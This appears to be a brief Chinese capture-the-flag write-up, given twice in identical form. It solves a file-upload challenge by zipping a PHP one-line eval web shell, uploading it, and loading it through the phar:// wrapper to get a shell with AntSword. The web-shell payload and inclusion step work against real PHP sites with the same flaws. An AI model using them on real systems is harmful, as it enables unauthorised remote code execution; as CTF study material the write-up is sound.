1.打开环境,审计代码。
是文件上传漏洞的题目。
(1)发现有注入点
(2)有可以上传压缩包的提示。
于是想到运用phar伪协议上传zip的一句话木马getshell
payload:
<?php @eval($_POST['aa']);?>#简单的一句话木马构造php文件
压缩成zip文件,上传
?bingdundun=phar://(文件路径)/(文件名)
用蚁剑getshell
1.打开环境,审计代码。
是文件上传漏洞的题目。
(1)发现有注入点
(2)有可以上传压缩包的提示。
于是想到运用phar伪协议上传zip的一句话木马getshell
payload:
<?php @eval($_POST['aa']);?>#简单的一句话木马构造php文件
压缩成zip文件,上传
?bingdundun=phar://(文件路径)/(文件名)
用蚁剑getshell